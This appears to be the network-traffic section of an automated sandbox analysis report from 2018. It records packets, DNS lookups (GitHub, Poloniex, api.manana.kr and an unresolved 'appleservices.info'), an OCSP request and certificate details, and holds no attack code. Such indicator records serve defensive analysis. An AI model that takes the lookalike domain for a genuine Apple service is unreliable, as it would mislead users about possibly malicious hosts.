    Nov 2, 2018 11:04:25.445213079 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.445502996 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.445822001 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.445887089 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.445997953 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.446095943 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.446106911 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.446326017 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.446815968 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.446896076 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447011948 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447072029 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.447129011 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447241068 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447318077 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.447357893 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447455883 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.447470903 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447585106 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447659016 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.447704077 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447815895 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447860003 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.447933912 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.447974920 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.448045969 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.448137045 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.448163986 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.448275089 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.448362112 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.448398113 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.448506117 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.448589087 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.448625088 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.448734999 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.448806047 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.449003935 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.548553944 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.548784018 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.548898935 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.549012899 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.549034119 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.549132109 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.549242973 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.549249887 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.549357891 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.549473047 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.549510002 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.549649954 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.549964905 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.550029993 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.550137997 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.550249100 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.550251961 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.550364017 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.550445080 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.550482035 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.550693989 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.550729990 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.550812960 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.550924063 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.550932884 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.551039934 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.551120996 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.551156998 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.551270008 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.551326990 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.551387072 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.551498890 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.551614046 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.551630020 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.551687002 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.551917076 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.552165031 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.553809881 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.554039955 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.554156065 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.554260015 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.554270983 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.554384947 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.554549932 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.554580927 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.554759979 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.554789066 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.554874897 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.554984093 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.554986954 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.555102110 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.555201054 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.555217981 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.555330992 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.555385113 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.555449009 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.555504084 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.555563927 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.555661917 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.555676937 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.555880070 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.555895090 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.555991888 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.556035042 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.556106091 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.556138039 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.556222916 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.556333065 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.556417942 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.556454897 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.556483030 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.556601048 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.556669950 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.556879044 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.558305025 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.559107065 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.663899899 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.664011002 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.664047003 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.664469004 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.664484024 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.664530039 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.664771080 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:50.185632944 MEZ5158453192.168.0.508.8.8.8
    Nov 2, 2018 11:04:50.210907936 MEZ53515848.8.8.8192.168.0.50
    Nov 2, 2018 11:04:50.212826014 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.217504978 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.217900038 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.218662024 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.223510027 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.226002932 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.226372957 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.226841927 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.228317022 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.228327990 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.228333950 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.228351116 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.231820107 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.232181072 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.232614994 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.233268023 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.233409882 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.233619928 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.237166882 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.375374079 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.375493050 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.375627995 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.375648975 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.375768900 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.375788927 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.375895023 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.375912905 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.375931978 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.375950098 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.376018047 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.376060009 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.376075029 MEZ44349251104.20.12.48192.168.0.50
    Nov 2, 2018 11:04:50.376184940 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.376252890 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.376341105 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.376348019 MEZ49251443192.168.0.50104.20.12.48
    Nov 2, 2018 11:04:50.376583099 MEZ49251443192.168.0.50104.20.12.48

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 2, 2018 10:59:49.343641996 MEZ5812453192.168.0.508.8.8.8
    Nov 2, 2018 10:59:49.370820999 MEZ53581248.8.8.8192.168.0.50
    Nov 2, 2018 10:59:50.228516102 MEZ5907053192.168.0.508.8.8.8
    Nov 2, 2018 10:59:50.229161978 MEZ6318453192.168.0.508.8.8.8
    Nov 2, 2018 10:59:50.259983063 MEZ53590708.8.8.8192.168.0.50
    Nov 2, 2018 10:59:50.754837990 MEZ53631848.8.8.8192.168.0.50
    Nov 2, 2018 10:59:51.382724047 MEZ6534753192.168.0.508.8.8.8
    Nov 2, 2018 10:59:51.383797884 MEZ5957653192.168.0.508.8.8.8
    Nov 2, 2018 10:59:51.412254095 MEZ53653478.8.8.8192.168.0.50
    Nov 2, 2018 10:59:51.415460110 MEZ53595768.8.8.8192.168.0.50
    Nov 2, 2018 10:59:55.191101074 MEZ5678853192.168.0.508.8.8.8
    Nov 2, 2018 10:59:55.216177940 MEZ53567888.8.8.8192.168.0.50
    Nov 2, 2018 10:59:58.724548101 MEZ5153653192.168.0.508.8.8.8
    Nov 2, 2018 10:59:58.744282007 MEZ53515368.8.8.8192.168.0.50
    Nov 2, 2018 11:00:03.872883081 MEZ6180953192.168.0.508.8.8.8
    Nov 2, 2018 11:00:03.898951054 MEZ53618098.8.8.8192.168.0.50
    Nov 2, 2018 11:01:22.046365023 MEZ5112953192.168.0.508.8.8.8
    Nov 2, 2018 11:01:22.079787016 MEZ53511298.8.8.8192.168.0.50
    Nov 2, 2018 11:02:18.934636116 MEZ5723053192.168.0.508.8.8.8
    Nov 2, 2018 11:02:18.939795017 MEZ53572308.8.8.8192.168.0.50
    Nov 2, 2018 11:02:53.319498062 MEZ5570353192.168.0.508.8.8.8
    Nov 2, 2018 11:02:53.344573975 MEZ53557038.8.8.8192.168.0.50
    Nov 2, 2018 11:04:24.682725906 MEZ6058353192.168.0.508.8.8.8
    Nov 2, 2018 11:04:24.711186886 MEZ53605838.8.8.8192.168.0.50
    Nov 2, 2018 11:04:50.185632944 MEZ5158453192.168.0.508.8.8.8
    Nov 2, 2018 11:04:50.210907936 MEZ53515848.8.8.8192.168.0.50

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Nov 2, 2018 10:59:49.343641996 MEZ192.168.0.508.8.8.80x4158Standard query (0)github.comA (IP address)IN (0x0001)
    Nov 2, 2018 10:59:50.228516102 MEZ192.168.0.508.8.8.80x4ac5Standard query (0)poloniex.comA (IP address)IN (0x0001)
    Nov 2, 2018 10:59:50.229161978 MEZ192.168.0.508.8.8.80xcd88Standard query (0)api.manana.krA (IP address)IN (0x0001)
    Nov 2, 2018 10:59:51.382724047 MEZ192.168.0.508.8.8.80xf097Standard query (0)ocsp.int-x3.letsencrypt.orgA (IP address)IN (0x0001)
    Nov 2, 2018 10:59:55.191101074 MEZ192.168.0.508.8.8.80xf166Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
    Nov 2, 2018 11:00:03.872883081 MEZ192.168.0.508.8.8.80x90daStandard query (0)appleservices.infoA (IP address)IN (0x0001)
    Nov 2, 2018 11:01:22.046365023 MEZ192.168.0.508.8.8.80x981eStandard query (0)github.comA (IP address)IN (0x0001)
    Nov 2, 2018 11:02:53.319498062 MEZ192.168.0.508.8.8.80x6199Standard query (0)github.comA (IP address)IN (0x0001)
    Nov 2, 2018 11:04:24.682725906 MEZ192.168.0.508.8.8.80x48e2Standard query (0)github.comA (IP address)IN (0x0001)
    Nov 2, 2018 11:04:50.185632944 MEZ192.168.0.508.8.8.80x9f07Standard query (0)poloniex.comA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
    Nov 2, 2018 10:59:49.370820999 MEZ8.8.8.8192.168.0.500x4158No error (0)github.com192.30.253.112A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:49.370820999 MEZ8.8.8.8192.168.0.500x4158No error (0)github.com192.30.253.113A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:50.259983063 MEZ8.8.8.8192.168.0.500x4ac5No error (0)poloniex.com104.20.13.48A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:50.259983063 MEZ8.8.8.8192.168.0.500x4ac5No error (0)poloniex.com104.20.12.48A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:50.754837990 MEZ8.8.8.8192.168.0.500xcd88No error (0)api.manana.kr133.130.107.154A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:51.412254095 MEZ8.8.8.8192.168.0.500xf097No error (0)ocsp.int-x3.letsencrypt.orgocsp.int-x3.letsencrypt.org.edgesuite.netCNAME (Canonical name)IN (0x0001)
    Nov 2, 2018 10:59:51.412254095 MEZ8.8.8.8192.168.0.500xf097No error (0)a771.dscq.akamai.net23.10.249.171A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:51.412254095 MEZ8.8.8.8192.168.0.500xf097No error (0)a771.dscq.akamai.net23.10.249.152A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:51.415460110 MEZ8.8.8.8192.168.0.500x9da4No error (0)a279.dscq.akamai.net23.10.249.146A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:51.415460110 MEZ8.8.8.8192.168.0.500x9da4No error (0)a279.dscq.akamai.net23.10.249.168A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:55.216177940 MEZ8.8.8.8192.168.0.500xf166No error (0)raw.githubusercontent.comgithub.map.fastly.netCNAME (Canonical name)IN (0x0001)
    Nov 2, 2018 10:59:55.216177940 MEZ8.8.8.8192.168.0.500xf166No error (0)github.map.fastly.net151.101.0.133A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:55.216177940 MEZ8.8.8.8192.168.0.500xf166No error (0)github.map.fastly.net151.101.64.133A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:55.216177940 MEZ8.8.8.8192.168.0.500xf166No error (0)github.map.fastly.net151.101.128.133A (IP address)IN (0x0001)
    Nov 2, 2018 10:59:55.216177940 MEZ8.8.8.8192.168.0.500xf166No error (0)github.map.fastly.net151.101.192.133A (IP address)IN (0x0001)
    Nov 2, 2018 11:00:03.898951054 MEZ8.8.8.8192.168.0.500x90daName error (3)appleservices.infononenoneA (IP address)IN (0x0001)
    Nov 2, 2018 11:01:22.079787016 MEZ8.8.8.8192.168.0.500x981eNo error (0)github.com192.30.253.113A (IP address)IN (0x0001)
    Nov 2, 2018 11:01:22.079787016 MEZ8.8.8.8192.168.0.500x981eNo error (0)github.com192.30.253.112A (IP address)IN (0x0001)
    Nov 2, 2018 11:02:53.344573975 MEZ8.8.8.8192.168.0.500x6199No error (0)github.com192.30.253.113A (IP address)IN (0x0001)
    Nov 2, 2018 11:02:53.344573975 MEZ8.8.8.8192.168.0.500x6199No error (0)github.com192.30.253.112A (IP address)IN (0x0001)
    Nov 2, 2018 11:04:24.711186886 MEZ8.8.8.8192.168.0.500x48e2No error (0)github.com192.30.253.112A (IP address)IN (0x0001)
    Nov 2, 2018 11:04:24.711186886 MEZ8.8.8.8192.168.0.500x48e2No error (0)github.com192.30.253.113A (IP address)IN (0x0001)
    Nov 2, 2018 11:04:50.210907936 MEZ8.8.8.8192.168.0.500x9f07No error (0)poloniex.com104.20.12.48A (IP address)IN (0x0001)
    Nov 2, 2018 11:04:50.210907936 MEZ8.8.8.8192.168.0.500x9f07No error (0)poloniex.com104.20.13.48A (IP address)IN (0x0001)

    HTTP Request Dependency Graph

    • ocsp.int-x3.letsencrypt.org

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination Port
    0192.168.0.504924323.10.249.17180
    TimestampkBytes transferredDirectionData
    Nov 2, 2018 10:59:51.418445110 MEZ173OUTGET /MFgwVqADAgEAME8wTTBLMAkGBSsOAwIaBQAEFH7maudymrP8%2BKIgZGwWoS1gcQhdBBSoSmpjBH3duubRObemRWXv86jsoQISBEPFo0kDZ%2BqvsHbeCoThsluI HTTP/1.1
    Host: ocsp.int-x3.letsencrypt.org
    Connection: close
    User-Agent: trustd (unknown version) CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
    Nov 2, 2018 10:59:51.455786943 MEZ177INHTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 527
    ETag: "999D95CAC147615E7EB8F495FE0456C446C860522A32C669D06A3207A0BB6D54"
    Last-Modified: Thu, 01 Nov 2018 19:00:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=31208
    Expires: Fri, 02 Nov 2018 18:39:59 GMT
    Date: Fri, 02 Nov 2018 09:59:51 GMT
    Connection: close
    Data Raw: 30 82 02 0b 0a 01 00 a0 82 02 04 30 82 02 00 06 09 2b 06 01 05 05 07 30 01 01 04 82 01 f1 30 82 01 ed 30 81 d6 a1 4c 30 4a 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 16 30 14 06 03 55 04 0a 13 0d 4c 65 74 27 73 20 45 6e 63 72 79 70 74 31 23 30 21 06 03 55 04 03 13 1a 4c 65 74 27 73 20 45 6e 63 72 79 70 74 20 41 75 74 68 6f 72 69 74 79 20 58 33 18 0f 32 30 31 38 31 31 30 31 31 39 30 30 30 30 5a 30 75 30 73 30 4b 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 7e e6 6a e7 72 9a b3 fc f8 a2 20 64 6c 16 a1 2d 60 71 08 5d 04 14 a8 4a 6a 63 04 7d dd ba e6 d1 39 b7 a6 45 65 ef f3 a8 ec a1 02 12 04 43 c5 a3 49 03 67 ea af b0 76 de 0a 84 e1 b2 5b 88 80 00 18 0f 32 30 31 38 31 31 30 31 31 39 30 30 30 30 5a a0 11 18 0f 32 30 31 38 31 31 30 38 31 39 30 30 30 30 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 2c 7b db 88 8f e5 9e 78 49 0e 90 ca 68 fb 2b 81 c0 8a 35 e0 a3 3f ac e9 48 53 09 75 b5 29 c6 1f 95 76 8c 2c e6 0b 67 0b 6e 67 4d 1e ab 73 8b ed ea 8d da 3e ed 6c b4 96 10 67 be e5 ad aa cc 16 ba 97 55 c2 aa 57 4b 02 d7 16 68 fc 79 cc 8d a0 e5 4b a5 23 73 96 d5 8d 13 77 f2 ba 7d 9a 7e 52 b3 cc 3f b5 ef 2c b3 c1 21 de c5 8c d1 6e 7b 64 f4 4f 6b 0a a5 82 de 1f a9 af 93 25 8c 5a 26 a3 ad 73 c6 1b 97 71 ff c8 53 78 ce b7 ae be e4 39 6e 52 a2 0a 18 9f 31 60 8f 55 99 5f db d1 e0 94 c3 a4 b1 ce bd a0 a1 30 35 f5 cd 8d 02 cf ef 8f 64 9c 5e 46 06 50 af 6c b0 d7 09 b5 cc 39 ee df 25 ad 8c 53 68 d1 bf ab 2e 9c a8 11 be 8b ef 50 ac 67 ea 77 45 f8 3b 96 d7 b5 39 d4 ff 86 ce b1 b7 c5 d3 24 88 b3 7d 59 92 67 4e d2 e3 d7 14 7a c3 f9 ae 42 a0 8a 81 01 f1 55 23 0e 9e bb 27 1c
    Data Ascii: 00+000L0J10UUS10ULet's Encrypt1#0!ULet's Encrypt Authority X320181101190000Z0u0s0K0+~jr dl-`q]Jjc}9EeCIgv[20181101190000Z20181108190000Z0*H,{xIh+5?HSu)v,gngMs>lgUWKhyK#sw}~R?,!n{dOk%Z&sqSx9nR1`U_05d^FPl9%Sh.PgwE;9$}YgNzBU#'


    HTTPS Packets

    TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
    Nov 2, 2018 10:59:50.179255009 MEZ44349240192.30.253.112192.168.0.50CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private OrganizationCN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue May 08 02:00:00 CEST 2018Wed Jun 03 14:00:00 CEST 2020[[ Version: V3 Subject: CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=5157550, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 25025100770112519133826373044337089322469791879220152213643221754976969243477927257227415181039366015609149001175458675631697702239034823716334509809784926406937227125890521894087124165874208928008511527244368706849310092475511259401776633076671238008575313180508596720476568749022900129891932143823778833404532554658303977351639532131107111874168053266560861447299063764771943313867349795002140249378509492410727023509926138655327290063258841194245159501288231930813126290727910076185376418441777313922434226388044466254908262848472806237246586907086347793775219421137443851512766147228992395134669954845000049168203 public exponent: 65537 Validity: [From: Tue May 08 02:00:00 CEST 2018, To: Wed Jun 03 14:00:00 CEST 2020] Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0a063042 7f5bbced 69573965 93b6451f]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 82 01 6E 04 82 01 6A 01 68 00 76 00 A4 B9 09 ...n...j.h.v....0010: 90 B4 18 58 14 87 BB 13 A2 CC 67 70 0A 3C 35 98 ...X......gp.<5.0020: 04 F9 1B DF B8 E3 77 CD 0E C8 0D DC 10 00 00 01 ......w.........0030: 63 41 62 6D 0A 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0040: D1 66 9D FC 71 35 AC 58 7D 86 74 1A 5E FE E3 D3 .f..q5.X..t.^...0050: 5A 7B 2E FE 6E 01 10 2D BE 74 87 2F 4B 29 19 62 Z...n..-.t./K).b0060: 02 20 08 FE 60 1A FE B2 CD A6 B3 C4 12 B6 37 01 . ..`.........7.0070: 9D 9A 6C AE 10 53 52 83 6A 40 45 B3 09 95 41 60 ..l..SR.j@E...A`0080: 53 95 00 76 00 56 14 06 9A 2F D7 C2 EC D3 F5 E1 S..v.V.../......0090: BD 44 B2 3E C7 46 76 B9 BC 99 11 5C C0 EF 94 98 .D.>.Fv....\....00A0: 55 D6 89 D0 DD 00 00 01 63 41 62 6D 2D 00 00 04 U.......cAbm-...00B0: 03 00 47 30 45 02 21 00 A2 EE 89 94 BD 82 E6 D1 ..G0E.!.........00C0: BD 8B A1 BB 44 79 10 18 9E 52 28 EE 7E 89 C5 B6 ....Dy...R(.....00D0: 1D AE D6 1D 98 F5 16 25 02 20 56 0C 35 01 9E 75 .......%. V.5..u00E0: BC AF 44 36 29 C1 83 6D 85 3F 16 FC D9 3B CD 0C ..D6)..m.?...;..00F0: ED 39 4F 5E E1 C5 74 42 D8 86 00 76 00 BB D9 DF .9O^..tB...v....0100: BC 1F 8A 71 B5 93 94 23 97 AA 92 7B 47 38 57 95 ...q...#....G8W.0110: 0A AB 52 E8 1A 90 96 64 36 8E 1E D1 85 00 00 01 ..R....d6.......0120: 63 41 62 6D DF 00 00 04 03 00 47 30 45 02 21 00 cAbm......G0E.!.0130: A1 CD D4 CA 51 4D 8D F9 77 2A 70 AD 0E 25 8A CD ....QM..w*p..%..0140: F0 46 32 9E 5A 15 C6 1A 38 C8 F9 3A 0E AD C4 3E .F2.Z...8..:...>0150: 02 20 74 D1 F9 BB CA C2 DD 47 2C 95 05 78 07 DA . t......G,..x..0160: 34 6B 4C 36 D3 8A 26 0D 11 06 29 35 6E 12 9C 46 4kL6..&...)5n..F0170: 78 E4 x.[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com, accessMethod: caIssuers accessLocation: URIName: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 